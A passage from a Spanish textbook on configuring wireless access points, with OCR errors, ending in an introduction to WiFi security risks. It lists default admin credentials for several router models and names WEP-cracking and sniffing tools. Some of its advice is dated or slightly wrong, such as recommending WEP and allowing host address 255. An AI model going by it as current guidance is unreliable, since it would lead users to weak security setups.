punto de acceso ya se encarga de1" pasarle a cada computadora los datos necesarios para
establecer la comunicación. La forma de configurar la computadora para obtener las
direcciones IP de forma automática depende del sistema operativo de que se dispone.

Los pasos a dar para cada sistema operativo Windows son los siguientes:

• Con Windows XP hay que hacer clic en Inicio, Configuración, Conexiones de red.
A continuación se hace clic con el botón derecho sobre Conexión de área local y se
elige Propiedades. También se puede llegar aquí eligiendo Cambiar la configuración
de esta conexión en la ficha Tareas de red. Se continúa haciendo clic sobre
Protocolo Internet (TCP/IP) y, luego, sobre el botón Propiedades. Se marca la
opción Obtener una dirección IP automáticamente. Hay que verificar también que
está marcada la opción Obtener la dirección del servidor DNS automáticamente.
Para terminar, cierre todas las ventanas dando clic en Aceptar.

• Con Windows VISTA a configuración de una conexión de red en Windows Vista, al


igual que en Windows XP, es algo que se suele hacer de forma automática una vez
que el sistema detecta la tarjeta de red. Pero a veces interesa hacer una
configuración manual de esta conexión. Y esto suele ser por muchos motivos,
siendo uno de ellos que necesitemos que ese ordenador se conecte siempre con la
misma IP (hablamos de la IP privada, que la IP pública ya hemos dicho en varias
ocasiones que depende de nuestro servidor ISP). Vamos a ver cómo proceder para
configurar manualmente esta conexión de red, y en especial el apartado TCP/IP, que
a nivel usuario es el que nos interesa.

REDES WLAN CON ACCESS POINT 110


• Para empezar, vamos a ver como accedemos a la conexión de red vamos a Inicio y
en el panel de la derecha tenemos Red. Picamos en Red y se nos muestra la
siguiente ventana, con nuestras conexiones de red. En la parte superior vemos un
enlace a Centro de redes y recursos compartidos. Damos clic en este enlace y se nos
muestra la siguiente ventana. En esta ventana de Centro de redes y recursos
compartidos, en el panel de la izquierda, tenemos la opción Administrar conexiones
de red. Bien, una vez que hacemos clic sobre Administrar conexiones de red se nos
muestra la ventana. En esta ventana vemos nuestras conexiones de red. Damos con
el botón secundario del ratón (normalmente el derecho) y, en el menú contextual
que se nos despliega, damos en Propiedades para pasar a la siguiente ventana. En
esta ventana vemos los elementos que usa esa conexión. Vamos directamente a
Protocolo de Internet versión 4 (TCP/IPv4) y pasamos a la siguiente ventana.

Figura 5.10 Configuración de protocolo TCP/IP en Windows Vista.

REDES WLAN CON ACCESS POINT 111


Aunque, generalmente, se configure el protocolo TCP/IP de la computadora para obtener
automáticamente las direcciones IP del punto de acceso, si se desea, también podrían
configurarse unos datos concretos.

En este caso, los datos serian los siguientes:

Número IP de la computadora: Cualquier número, siempre que esté dentro del rango de
numeración de la red local inalámbrica. Eso sí, cada computadora debe disponer de un
número IP distinto. Por ejemplo, si el número IP del punto de acceso es el 192.168.1.1, a
las computadoras se les podría asignar los números 192.168.1.X, donde X es cualquier
número entre 2 y 255.

Máscara de subred: Generalmente, se suele utilizar como máscara de subred el número


255.255.255.0. Este número es válido para redes que dispongan de menos de 255
terminales.

Puerta de enlace: Aquí habría que indicar el número IP del punto de acceso. En el ejemplo
puesto anteriormente, este número sería el 192.168.1.1.
DNS: Lo normal es introducir aquí la dirección IP del punto de acceso. Ya el punto de
acceso sabrá asignar el DNS adecuado. No obstante, si se está conectado a Internet y se
conoce la dirección de los DNS, podría configurarse directamente en este campo.

5.6 CONFIGURAR EL PUNTO DE ACCESO.

Una vez que se dispone del punto de acceso, antes de colocarlo en su lugar definitivo, es
conveniente proceder a su configuración. La mayoría de los fabricantes ya facilitan
el punto de acceso con una configuración por defecto. Esta configuración suele ser
adecuada para una red con un solo punto de acceso. En este caso, el fabricante facilita los
valores (fundamentalmente el nombre de red y las características de seguridad) con los que
hay que configurar los adaptadores de red de las computadoras de los usuarios de la red.

REDES WLAN CON ACCESS POINT 112


Si se desea configurar unos valores propios o se tiene la necesidad de realizar algún tipo de
configuración especial, entonces será necesario modificar la configuración. La forma de
configurar un punto de acceso depende del fabricante o, incluso, del modelo del equipo. Por
ello, siempre es recomendable atender a las instrucciones del manual de usuario del equipo.
En cualquier caso, los pasos a seguir son los siguientes:

1.- Establecer una conexión entre una computadora y el punto de acceso. Esta conexión se
puede llevar a cabo de dos formas:

• Vía inalámbrica. En este caso se debe configurar el adaptador de red de la


computadora con el nombre de red (SSID) especificado en el manual de usuario del
punto de acceso.
• Vía cable. En el caso de llevarse a cabo la conexión vía cable, se tienen tres
posibilidades: cable Ethernet 10/100 BaseT a conectar en puertos RJ45 de la
computadora y del punto de acceso, cable USB o cable específico del equipo a
conectar al puerto serie de la computadora.

2.- A continuación tenemos dos alternativas dependiendo del modelo del punto de acceso:

• Mediante una aplicación de configuración. Esto supone ejecutar una


aplicación específica de configuración que viene incluida en el CD que viene con el
punto de acceso. Esta aplicación suele localizarse en la carpeta principal del CD
bajo el nombre setup.
• Mediante el servidor web del punto de acceso. En este caso el punto de acceso
incluye un servidor web al cual se accede desde la computadora del usuario
mediante cualquier navegador de Internet (Internet Explorer o Netscape).
Previamente hay que configurar la computadora para que obtenga la dirección IP
de forma automática e introducir en el navegador de Internet la dirección (URL) que
se indica en el manual de usuario del punto de acceso (una dirección IP que suele
empezar por 192.168.X.X).

REDES WLAN CON ACCESS POINT 113


Esto llevará a una ventana donde se solicita el nombre de usuario y clave para entrar
en el menú de configuración. Estos datos pueden ser modificados por el
administrador de la red, pero, por defecto, el fabricante ofrece un nombre de usuario
y clave para permitirle al administrador entrar la primera vez. Estos datos por
defecto suelen consistir en dejar el nombre de usuario en blanco e introducir la clave
admin.

3.- Seguir las instrucciones del programa de configuración o moverse por las páginas web
del punto de acceso para llevar a cabo los cambios de configuración deseados.

Un punto importante es que, salvo que se utilice un cable especifico, para conectar la
computadora al punto de acceso, es necesario" que la computadora esté configurada
convenientemente. Esto supone que la computadora esté configurada para obtener la
dirección IP de forma automática.

Tabla 5.1. Ejemplos de URL, usuario y clave para acceder a distintos puntos de acceso.

MODELO URL USUARIO CLAVE


Linksys AP 192.168.1.1 admin.
router/switch
SpeedStream 2623 192.168.254.254 admin.

3Com Homeconnect 192.168.2.1 admin.

3Com Officeconnect 192.168.1.1 admin.

Adaptec Ultra Gíreles 192.168.8.1 admin admin.

Otros 192.168.1.250 admin.

REDES WLAN CON ACCESS POINT 114


5.6.1 PROPIEDADES CONFIGURABLES EN EL PUNTO DE ACCESO.

Existen modelos de puntos de acceso que solamente son puntos de acceso de red local
inalámbrica. Sin embargo, es habitual encontrar modelos de puntos de acceso que, además,
incluyen en su interior un router, un switch o un módem DSL. Por este motivo, las
propiedades que son configurables en cada modelo de punto de acceso pueden variar
dependiendo de todo lo que sea capaz de hacer. En cualquier caso, las propiedades
principales propias de las funciones de punto de acceso son las siguientes:

• Nombre de red (Network name). Al nombre de red se le conoce también como


SSID (Service Set Identifier, ‘Identificador del Conjunto de Servicios’). Los puntos
de acceso suelen incluir un nombre de red por defecto. No obstante, es
recomendable sustituir este nombre por cualquier otro que se considere adecuado.
Por cierto, este nombre de red debe ser el que se configure en cada computadora.
Es importante recordar que en los nombres de red se diferencian las letras
mayúsculas de las minúsculas.

• Canal (Channel). Aquí se deberá introducir el número de canal que se considere


apropiado. Hay que tener en cuenta que, aunque el sistema me permita elegir
cualquier canal, existen limitaciones regulatorias para el uso de los canales
dependiendo del área geográfica en que nos encontremos. Por ejemplo, en España,
regulatoriamente, sólo se pueden utilizar los canales 10 y 11.

• Seguridad (Security). Los equipos WiFi disponen de determinadas


características de seguridad que pueden ser configuradas en el punto de acceso y en
los adaptadores de cada computadora que forme parte de la red. Es importante que
los parámetros de seguridad que aquí se configuren sean los mismos que los que se
configuren en cada computadora. La primera vez que se configura un punto
de acceso conviene dejar deshabilitados los parámetros WEP de seguridad.

REDES WLAN CON ACCESS POINT 115


Una vez comprobado que la red funciona adecuadamente, se puede proceder a
configurar las características de seguridad. Para utilizar el cifrado WEP, hay que
habilitar esta característica, elegir un tipo de cifrado (WEP type) e introducir una
clave de cifrado (WEP Key). Sólo existen dos tipos de cifrado: 64 bits y 128 bits. El
tipo de 128 bits ofrece un mayor nivel de seguridad, pero también es cierto que hace
bajar levemente el rendimiento. En cuanto a la clave de cifrado, se trata de una
palabra clave que puede incluir caracteres alfabéticos o numéricos. El sistema puede
mantener hasta cuatro claves, de las cuales sólo una estará activa. Periódicamente
debe cambiarse la clave activa para aumentar la seguridad del sistema. Algunos
sistemas incluyen una utilidad que permite generar claves de cifrado a partir de una
frase (passphrase). Es más fácil recordar la frase que la clave.

Figura 5.11 Propiedades de configuración de un Access Point.

REDES WLAN CON ACCESS POINT 116


Adicionalmente, los puntos de acceso ofrecen distintas características que ayudan a
gestionar la red. Algunas de estas características son las siguientes:

• Bajada automática de velocidad (Auto rafe fall back). Esta característica permite
que, cuando empeoren las condiciones de difusión de la señal radioeléctrica, el
sistema pueda bajar la velocidad de transmisión para mantener la comunicación
abierta.

• Selección de las computadoras autorizadas (Authorised MAC Address). Algunos


puntos de acceso incluyen la facilidad adicional de incluir una lista de las
computadoras autorizadas (lista de direcciones MAC) a conectarse al punto de
acceso.

Esta característica es interesante cuando se desea incrementar la seguridad de la red,


pero no resulta práctica cuando se desea "disponer de una red inalámbrica
abierta a nuevos usuarios. En este caso, tener seleccionada esta opción forzaría a
cambiar la configuración del punto de acceso cada vez que se desea conectar un
nuevo equipo. Las direcciones MAC son unos números únicos que cada fabricante
asigna a todos sus dispositivos inalámbricos. Este número identifica al
dispositivo de forma inequívoca (incluidos los adaptadores de red de las
computadoras). Las direcciones MAC están formadas por 12 caracteres
alfanuméricos (por ejemplo, I2-AB-56-78-90-FE).

• Emitir el nombre de red (Broadcast SSID to associate). Los puntos de acceso


emiten generalmente su nombre de red (SSID) para permitirle a los posibles
usuarios que puedan asociarse a la red con facilidad. No obstante, si se desea
aumentar la seguridad de la red, puede deshabilitarse esta opción. Esto hará que sólo
puedan conectarse a la red aquellos usuarios que conozcan su nombre.

REDES WLAN CON ACCESS POINT 117


• Clave de acceso (Password). El punto de acceso dispone de una clave para impedir
el acceso a sus funciones de configuración. El fabricante configura a todos sus
equipos con una misma clave de acceso (generalmente admin), pero el
usuario debe cambiar esta clave para aumentar la seguridad de su equipo.

• Habilitar la red inalámbrica (Enable Wireles Networking). Algunos equipos


permiten que su función de punto de acceso pueda ser habilitada o deshabilitada.
Esto es útil, fundamentalmente, cuando el punto de acceso dispone también de las
funciones de router o switch. En algún caso podría ser interesante mantener sus
funciones de router y deshabilitar SUS funciones de punto de acceso.

5.6.2 SELECCIÓN DE CANAL

Las redes WiFi disponen de 11 canales de 11 Mbps cada uno. Cada canal viene identificado
por un número del 1 al 11 y, por defecto, la mayoría de los puntos de acceso ya vienen
configurados con un determinado canal.

No obstante, el número de canal que va a utilizar cada punto de acceso es configurable.


Esto es así porque, de otra forma, los puntos de acceso vecinos que vengan configurados
con el mismo canal por defecto se interferirían unos a otros.

Cuando se colocan varios puntos de acceso para cubrir un área de cobertura de una misma
red, debe procurarse que el área de solapamiento sea mínima y, además, configurar
diferentes canales en cada uno de ellos.

REDES WLAN CON ACCESS POINT 118


Figura 5.12 Distribución de canales en células hexagonales.

Cada número de canal WiFi se corresponde con una frecuencia determinada. Los números
consecutivos representan también frecuencias consecutivas. Por lo tanto, mientras más
diferencia haya entre los números de canal, mayor diferencia habrá entre sus frecuencias.
En una red con múltiples puntos de acceso es interesante tener en cuenta este detalle para
intentar configurar a los puntos de acceso vecinos, no solamente con canales distintos (cosa
imprescindible), sino que sus frecuencias estén lo más lejanas posible.

Figura 5.13 Distribución de canales en células cuadradas.

REDES WLAN CON ACCESS POINT 119


En teoría, con tan sólo tres frecuencias se podría cubrir cualquier área, por grande que ésta
fuera, sin dejar zonas en sombra. Para ello, basta con imaginarse que cada punto de acceso
dispone de un área de cobertura hexagonal (lo que también se conoce como célula). Como
se dispone de 11 canales, una buena elección de canales sería el 1,6 y 11.

Esto nos dejaría una distancia de cuatro canales intermedios. En la asignación de canales a
los puntos de acceso, hay que tener en cuenta que la ^propagación de las señales de radio se
efectúa tanto horizontal como verticalmente. Esto quiere decir que, si tenemos dos plantas
de un edificio cubiertas por distintos puntos de acceso, habría que comprobar que no se
producen interferencias entre plantas.

La teoría anterior no es del todo aplicable a países como España o Francia donde la
regulación sólo permite la utilización de un número muy reducido de canales (dos en el
caso de España, el 10 y 11, y cuatro en el caso de Francia, del 10 al 13).

En estos casos, la única solución consiste en permitir zonas de sombra entre los puntos de
acceso. El inconveniente es que, no sólo se impedirá el desplazamiento sin interrupción del
servicio, sino que el número de usuarios que pueden coexistir en una misma área será
bastante menor.

REDES WLAN CON ACCESS POINT 120


Tabla 5.2. Regulación de canales y frecuencias en distintos países.

CANAL Frecuencia FCC ETSI España Francia Japón


(MHz) (USA) (Europa)

1 2412 X X
2 2417 X X
3 2422 X X X
4 2427 X X X
5 2432 X X X
6 2437 X X X
7 2442 X X X
8 2447 X X X
9 2452 X X X
10 2457 X X X X X
11 2462 X X X X X
12 2467 X X X
13 2472 X X X
14 2484 X

5.7 CONEXIÓN CON LA RED LOCAL CABLEADA E INTERNET.

Cuando se desea conectar un punto de acceso a una red local cableada o a Internet, los
parámetros que hay que configurarle son los mismos que hay que configurarle a cualquier
computadora que forma parte de la red cableada. Para ello, las utilidades de configuración
del punto de acceso dan la opción de configurar estos parámetros. Una posibilidad muy
común es configurar el punto de acceso para que obtenga las direcciones IP de su conexión
con la red local cableada o con el proveedor de acceso a Internet (ISP) de una forma
automática. Para ello, el punto de acceso ofrece una opción con el nombre Obtener una
dirección IP automáticamente o similar. Si las opciones le aparecen en inglés, el
equivalente seria Obtain an IP automatically o similar.

REDES WLAN CON ACCESS POINT 121


Si hubiese que configurar los datos manualmente, los parámetros a configurar son los
siguientes:

Dirección IP (IP Address). Es la dirección IP del punto de acceso como componente de la


red local cableada o la que el proveedor de acceso a Internet ha facilitado.

Máscara de subred (Subnet Mask). Es la máscara de la red local cableada o la que facilite
el proveedor de acceso a Internet. Un número de máscara muy común es el 255.255.255.0.

Puerta de enlace (Gateway). Es el número IP del equipo al que el punto de acceso tiene
que enviarle los datos con destino a Internet o red local cableada.

5.8 INTERCONEXIÓN DE LOS PUNTOS DE ACCESO.

La interconexión entre los distintos puntos de acceso que forman una red inalámbrica suele
realizarse mediante la conexión de cada uno de ellos con una red local cableada (idealmente
Ethernet). Lo que sí es interesante es considerar que dicha conexión supone tener que
disponer de cables que permitan enlazar los puntos de acceso con el router, switch o hub de
Ethernet.

5.8.1 COMPROBAR EL FUNCIONAMIENTO.

Bueno, una vez instalado todo lo instalable, sólo queda comprobar si funciona. Para ello se
puede empezar por probar las comunicaciones entre dos de las computadoras. Poco a poco
se pueden ir conectando uno a uno el resto de usuarios hasta comprobar que todo funciona
correctamente.La mayoría de los adaptadores de red incluyen un software de utilidades que
permite comprobar si el adaptador está recibiendo o no señales de otros equipos WiFi
(punto de acceso o adaptador), así como la calidad de dichas señales. La mejor forma de
comprobar el funcionamiento de una red WiFi es utilizando estas aplicaciones.

REDES WLAN CON ACCESS POINT 122


El sistema operativo Windows XP incluye aplicaciones propias tanto para la instalación de
los dispositivos WiFi como para su monitorización. Si no se dispone de una de estas
aplicaciones, se pueden probar las comunicaciones abriendo el Explorador de Windows
desde una de las computadoras y comprobar si se pueden ver los recursos que se han
compartido en las otras computadoras.

Es posible que, para hacer esto, tenga que hacer clic sobre la opción Entorno de red, Toda
la red y sobre el grupo de trabajo que haya definido. Si la computadora remota tiene
definido un nombre de usuario y clave de acceso para acceder a sus recursos, tendrá que
introducirlos.

Figura 5.14 Utilidades de Windows XP para monitoreo WiFi.

REDES WLAN CON ACCESS POINT 123


Recuerde que, para compartir recursos en una computadora, se debe abrir el Explorador de
Windows, buscar el recurso a compartir (el archivo, la carpeta, etc.) y hacer clic sobre él
con el botón derecho del ratón (el botón secundario). Aparecerá una lista de opciones donde
podremos ver una con el nombre Compartir. Haciendo clic sobre esta opción, veremos una
ventana con todas las opciones de compartición.

Si se conoce el número IP del punto de acceso, se puede comprobar que una computadora
está en comunicación con el punto de acceso abriendo un navegador de Internet (Internet
Explorer, por ejemplo) e introduciendo este número como dirección. Si se obtiene cualquier
respuesta distinta de página no encontrada, es que funciona la conexión. Incluso, todavía
sería más fiable la utilización del comando pingo Abra una ventana del DOS desde
Windows y teclee ping seguido del número IP del punto de acceso (por ejemplo, ping
192.168.1.1); si aparece una línea que empieza por repiy. from, es que la conexión
funciona. Si la línea empieza por Request timed out, es que no funciona.

5.9 GESTIÓN DE LA RED.

Existen aplicaciones que permiten vigilar y gestionar el funcionamiento de la red. De


hecho, existen dos tipos de aplicaciones: las que se instalan en las estaciones, aplicaciones
cliente, y las que instala el administrador para vigilar la red, aplicaciones de red. La
mayoría de estos programas se basan en el protocolo SNMP (Simple Network Management
Protocol, 'Protocolo Simple de Gestión de Red'). Un ejemplo de estas aplicaciones es HP
Openview.

Las aplicaciones clientes están relacionadas con la tarjeta de red inalámbrica de que se
disponga. Suele ser el propio proveedor del adaptador de red el que facilita la aplicación.
Estas aplicaciones facilitan información sobre la calidad de la señal, el estado de la
conexión, SSID, WEP, etc. Las aplicaciones cliente permiten definir distintos perfiles para
que el usuario pueda utilizar la misma tarjeta en distintas redes.

REDES WLAN CON ACCESS POINT 124


Las aplicaciones de red ofrecen herramientas tanto para el seguimiento como para la
gestión de la red. La mayoría de los puntos de acceso vienen acompañados de un software
de este tipo.

5.10 MEDIR LA VELOCIDAD

La velocidad máxima a la que transmite WiFi es de 11 Mbps para el estándar 802.11b y de


54 Mbps para el 802.11g; no obstante, esta velocidad puede ser menor dependiendo de la
distancia entre emisor y receptor y de las condiciones del entorno. También hay diferencias
si los equipos se encuentran en el interior de un edificio o en el exterior en espacio abierto.
La transmisión en el exterior suele ser de mayor calidad porque existen menos
interferencias y menos equipos intentando competir por el uso del espectro radioeléctrico.

Figura 5.15 Utilidad de Windows para medir la velocidad.

REDES WLAN CON ACCESS POINT 125


A pesar de lo anterior, la percepción de la velocidad es algo relativo. 1 Mbps es una buena
velocidad para la mayoría de las aplicaciones que tenemos hoy en día; no obstante, se
percibirá como lenta si se pretende transmitir un archivo de gran tamaño o acceder al
directorio de una computadora remota, pero en el resto de casos es una velocidad suficiente.

Si desea comprobar la velocidad a la que está haciendo uso de la red, la mayoría de las
aplicaciones cliente de las tarjetas WiFi permite comprobar este dato, además de otros
como la relación señal/ruido, nivel de recepción de la señal recibida, etc.

5.11 SOLUCIÓN DE PROBLEMAS.

Si, después de hacer todo el trabajo de instalación y configuración en una de las


computadoras, no es posible ver los recursos compartidos por el resto de computadoras, no
se desespere, a veces las instalaciones requieren una segunda pasada.

Lo primero que hay que hacer es comprobar lo evidente: comprobar que todos los
dispositivos están encendidos, funcionando y bien conectados. Si hubiese una antena
exterior, se deberá comprobar que está conectada. Las tarjetas PCMCIA (PC Card) o
unidades USB deben estar insertadas o conectadas a la computadora. Se pueden mover
estas conexiones para comprobar que están firmemente conectadas.
Si el fallo no es tan evidente, podemos probar otras causas:

• Sitúe las computadoras más cerca del punto de acceso evitando que haya obstáculos
en medio. Una vez establecida la conexión en estas condiciones, se podrán ir
separando las computadoras hasta situarlas en la localización deseada.

• Comprobar las luces de las unidades WiFi (adaptadores de red y puntos de acceso)
para comprobar si están funcionando como indican los manuales de usuario de los
equipos. Quizás esto nos dé una pista de lo que está funcionando mal.

REDES WLAN CON ACCESS POINT 126


• La mayoría del hardware (impresoras, equipos WiFi, etc.) dispone de una utilidad
que permite comprobar de forma local que dicho hardware está operando. Si se
dispone de dicha utilidad, se debe hacer la comprobación.

• Apague y encienda ambas computadoras. Algunas veces los propios registros de


Windows o de los controladores no funcionan adecuadamente inmediatamente
después de ser instalados y necesitan que se reinicie la computadora.

• Comprobar que el software de utilidad que venía con la unidad WiFi está instalado
y funcionando correctamente.

• Desconecte y vuelva a conectar su unidad WiFi. Esto hará que se reinicie esta
unidad. A veces es necesario este tipo de reinicio aunque la unidad haya estado
funcionando bien durante mucho tiempo.

• Comprobar que los parámetros de la comunicación (tipo de red, SSID y canal) están
configurados adecuadamente en ambos equipos. Cuando en una configuración de
red se va a permitir roaming (desplazamiento con servicio entre puntos de acceso),
las tarjetas WiFi de las computadoras deben configurarse para que adopten
automáticamente los valores de configuración de SSID y canal del punto de acceso.
Si fuese éste el caso, comprobar que está configurado correctamente.

• A veces, lo que está estropeado no son los circuitos electrónicos de un dispositivo,


sino los conectores o los cables. Esto se puede comprobar intercambiando los cables
o los dispositivos. Aunque WiFi sea inalámbrico, existen dispositivos que se
conectan a las computadoras o equipos de red (switches, hubs, routers, etc.)
utilizando cables.

REDES WLAN CON ACCESS POINT 127


5.12 SOLUCIÓN SI LA CONEXIÓN ES MALA

Si se puede establecer una conexión, pero esta conexión tiene muy mala calidad, podemos
hacer las siguientes comprobaciones:

• Intentar enviar o recibir un archivo. Si se puede acceder a dicho archivo, pero la


comunicación va extremadamente lenta (nunca se termina de completar la
transmisión), comprobar las posibles fuentes de interferencias o si existe un número
muy elevado de usuarios conectados en un solo punto de acceso.

• A veces funcionan bien las comunicaciones y otras veces no, comprobar si las fallas
coinciden con la circunstancia de haber muchos usuarios conectados a la red. Es
posible que en esas circunstancias se tengan sobrecargados los puntos de acceso. En
estos casos se pueden instalar puntos de acceso adicionales al lado del
anterior o comprobar si, reposicionando el punto de acceso, se consigue mejorar
la respuesta.

REDES WLAN CON ACCESS POINT 128


CAPITULO VI
SEGURIDAD EN UNA RED WIFI

INTRODUCCIÓN:

No existe ningún sistema de seguridad que sea absolutamente impenetrable. Como


sabemos, el objetivo de cualquier sistema de seguridad es permitir el acceso a cualquier
persona autorizada e impedírselo a cualquier otra. Sin embargo el simple hecho de que una
persona puede entrar, aunque sea de forma autorizada, hace que el sistema deje de ser
impenetrable. Si un intruso puede averiguar los pasos a dar para entrar ilegalmente
conseguirá romper la barrera.

Las comunicaciones inalámbricas tienen un inconveniente particular, carecen de barreras


físicas. Por tanto cualquier persona, con unos conocimientos mínimos sobre seguridad y
con una tarjeta WiFi instalada en su computadora, puede potencialmente acceder a un punto
de acceso de una red inalámbrica. No obstante, fundamentalmente, lo que hace que esto sea
cierto es que muy pocos usuarios se toman en serio las medidas de seguridad. Por ejemplo
suele ser común que un usuario instale una red WiFi sin modificar la configuración que trae
el sistema por defecto. Si un intruso desea entrar en un sistema, lo primero que comprobara
es si todavía tiene la configuración inicial. Por tanto, independientemente de que las redes
inalámbricas sean más o menos seguras, lo que es cierto es que vienen provistas de medidas
de seguridad para evitar que personas ajenas puedan hacer uso de la red.

REDES WLAN CON ACCESS POINT 129


Estas medidas son lo suficientemente buenas como para que la inmensa mayoría de las
personas que tenemos a nuestro alrededor no puedan entrar en la red. Aparte de lo anterior,
es cierto que la seguridad del sistema WiFi no es de las mejores. Se le ha criticado
extensivamente de ser un sistema muy débil, hasta el punto de que el IEEE ha creado un
grupo de trabajo 802.11 con el objetivo de proponer las medidas necesarias para conseguir
un sistema WiFi completamente seguro.

6.1 RIESGOS

La seguridad es un riesgo tanto para las redes inalámbricas como para las cableadas. Hasta
la fecha todas las tecnologías informáticas que han ido apareciendo en el mercado (desde la
computadora personal hasta las redes de cualquier tipo) han sido susceptibles, de una u otra
forma, de ser violadas en su integridad, confidencialidad o autenticidad de los datos que
contiene.

Ciertamente a diferencia de las redes cableada, las redes inalámbricas emiten señales que
pueden ser fácilmente recogidas en el exterior del recinto vigilado de la red (la oficina o el
hogar particular). Desde ese punto de vista las redes inalámbricas tienen un riesgo añadido.
Pero este riesgo es controlable. De la misma forma que es controlable el riesgo que tiene
una red cableada de que un usuario remoto y desconocido pueda entrar en ella a través de
su conexión a internet. El riesgo siempre existe si no se toman las precauciones necesarias.

Las cuatro categorías de riesgos que preocupan en el uso de cualquier tecnología de red son
las siguientes:

• Perdida del equipo


• Infección de un virus
• Uso equivocado por personas autorizadas
• Uso fraudulento por personas no autorizadas.

REDES WLAN CON ACCESS POINT 130


6.1.1 PERDIDA DEL EQUIPO.

A veces es sorprendente la cantidad de información que podemos llegar a almacenar en el


disco duro de nuestra computadora, información no solo profesional, sino, incluso,
personal: el listado de clientes, las cuentas de la empresa, las descripciones de productos, la
correspondencia con proveedores y clientes, la agenda de direcciones y teléfonos o las fotos
de las últimas vacaciones.

Perder una computadora puede convertirse en un gran problema si cae en las manos
equivocadas, aparte del problema que supone el exponer determinada información a ojos
indiscretos, existe un problema adicional y es que dicha computadora podría ser utilizada
para acceder a la red de nuestra empresa. Este problema existe tanto si la computadora está
conectada a una red cableada como si lo está a una red inalámbrica.

Si la red es cableada, el acceso a la red podría hacer desde cualquier parte del mundo vía
internet (si tiene las claves grabadas). En este caso, este riesgo puede eliminarse fácilmente
al deshabilitarlas cuentas de acceso del usuario en cuestión.

Si la red inalámbrica, el acceso se tendría que hacer necesariamente desde una zona de
cobertura. En este caso pueden cambiarse también todos los códigos de acceso. No
obstante, es cierto que administrativamente, es mucho más sencillo eliminar una cuenta de
acceso de una red cableada que cambiar manualmente las configuraciones de acceso de
todos los usuarios de la red inalámbrica (WiFi no dispone de un sistema automático). Sin
embargo también es cierto que, a menos que exista algún tipo de etiqueta identificativa, la
persona que consiga dicho equipo puede no disponer de ninguna pista para saber donde se
encuentra la red inalámbrica a la que se accede desde el equipo.

REDES WLAN CON ACCESS POINT 131


6.2 INFECCIÓN POR VIRUS

Como sabemos los virus son pequeños programas informáticos que pueden directamente
producir daño en la computadora o de la red en la que se aloja. Los virus afectan tanto a
redes cableadas como inalámbricas. Hasta la fecha no existe ningún virus que sea
específico de redes inalámbricas. Esto quiere decir que las medidas antivirus son idénticas,
independientemente del tipo de red al que se encuentre conectada la computadora:
mantener el programa antivirus actualizado y disponer de un cortafuegos (firewall).

6.3 USO EQUIVOCADO POR PERSONAS AUTORIZADAS.

El hacer un mal uso del sistema (intencionado o accidental) por personas autorizadas a
utilizarlo es una amenaza de la que es difícil protegerse. Una vez que el usuario ha pasado
todos los niveles de seguridad y se encuentra dentro del sistema, es complicado controlar en
detalle el uso que cada usuario hace de él.

Ciertamente, existen historias empleados que han robado información de su empresa,


borrado archivos, modificado información sensible o hecho cualquier otro uso
malintencionado de la información, claro que existen todavía más historias de empleados
que de una forma no mencionada producen el mismo daño compartiendo sus claves de
acceso abiertamente, introduciendo datos equivocados imprimiendo en la impresora
equivocada, enviando un mensaje de correo con información confidencial a personas
equivocadas o copiando datos confidenciales a su disco duro o flexible sin las medidas de
seguridad adecuadas.

Como se puede ver, estos riesgos son equivalentes tanto para las redes cableadas como para
las inalámbricas. El único sistema que existe para proteger de este riesgo es implantar una
política de seguridad adecuada en la empresa (que incluya programas de información a los
usuarios) y hacer seguimientos periódicos de su cumplimiento (auditorias).

REDES WLAN CON ACCESS POINT 132


6.4 USO FRAUDULENTO POR PERSONAS NO AUTORIZADAS

Si hay un punto en el que las redes inalámbricas WiFi tienen desventaja frente a las redes
cableadas este es el riesgo de uso fraudulento por personas no autorizadas. La desventaja
viene por lo que es su ventaja fundamental: cualquier usuario puede conectarse a la red
desde cualquier sitio sin necesidad de conectarse físicamente n ningún medio.

Los usos fraudulentos pueden venir por cualquiera de los siguientes caminos:

• Escuchar. Con un receptor adecuado, los datos emitidos por un usuario pueden ser
recogidos por terceras personas. De hecho existen programas como Airopeek,
Airsnort, NetStumbler o Wepcrack que facilitan esta labor. Estos programas
descubren datos como el SSID, la dirección MAC o si el sistema WEP está o no
habilitado.

• Acceder. Se trata de configurar un dispositivo para acceder a una red para la que no
se tiene autorización. Esto se puede hacer de dos formas: configurando una estación
para que no acceda a un punto de acceso existente o instalando un nuevo punto de
acceso y, a través de él, conectar fraudulentamente todas las computadoras externas
que se deseen.

• Romper la clave. Consiste en intentar adivinar la calve de acceso de un usuario


autorizado mediante intentos sucesivos.. un buen porcentaje de usuarios ponen sus
calves siguiendo una regla (tres o cuatro reglas de las iniciales del nombre, palabras
concretas, etc.) de hecho existen diccionarios de calves. El atacante solo tiene que
tener la paciencia necesaria hasta dar con la clave correcta.

REDES WLAN CON ACCESS POINT 133


• Saturar. En este caso no se trata de intentar acceder fraudulentamente a una red.
Sino dejarla fuera de servicio. El resultado es que la red no puede ser utilizada por
sus propios usuarios, por lo que es un ataque a la seguridad. Para dejar inhabilitada
una red inalámbrica, bastaría simplemente con saturar el medio radioeléctrico con el
suficiente ruido como para que sea imposible llevar a cabo cualquier comunicación.
A este tipo de ataques se le conoce también como obstrucción del servicio. DOS
(Denial of Service) o jamming (literalmente, ‘atasco’).

Dependiendo de la tecnología, cada una de estas categorías puede ser más o menos
peligrosa y por tanto más o menos preocupante. Hay que decir que muchos de estos ataques
se producen previa exploración de las redes inalámbricas existente. Esto se conoce en
inglés como WarDriving, consiste en descubrir puntos de acceso mientras se conduce por
la ciudad con una computadora portátil.

6.5 LAS DEBILIDADES DE WIFI

Se han hecho muchos estudios que demuestran que las redes inalámbricas IEEE 802.11 no
gozan de altos niveles de seguridad.
Cuatro tipos de ataques posibles contra WEP.

• El primero hacia posible descifrar un mensaje basado en la fragilidad del IV


(initialization Vector, ‘Vector de inicialización’ de solo 24 bits) y en la utilización
de códigos estáticos.
• El segundo ataque posibilitaría crear mensajes utilizando los mensajes existentes
• El tercer ataque permitirá descifrar la información contenida en las cabeceras de los
paquetes. Con esto se podría reenviar los paquetes a otra estación para descifrar allí
su contenido.
• El último ataque permitirá crear una tabla de IV (vectores de inicialización) y claves
permitiendo descifrar fácilmente todos los mensajes interceptados.

REDES WLAN CON ACCESS POINT 134


WECA (la asociación de fabricantes de productos y servicios inalámbricos que certifica los
equipos WiFi) siempre ha respondido a estos informes haciendo que los ataques descritos
siempre utilizan sistemas sofisticados que necesitan un esfuerzo y tiempo considerable para
llevarlos a cabo. Manifiesta que WEP sigue siendo un sistema suficientemente seguro como
para estar protegidos de la inmensa mayoría de los posibles intrusos. Por otro lado, WEP
nunca fue diseñado para ser un sistema de seguridad total. En cualquier caso, si se está
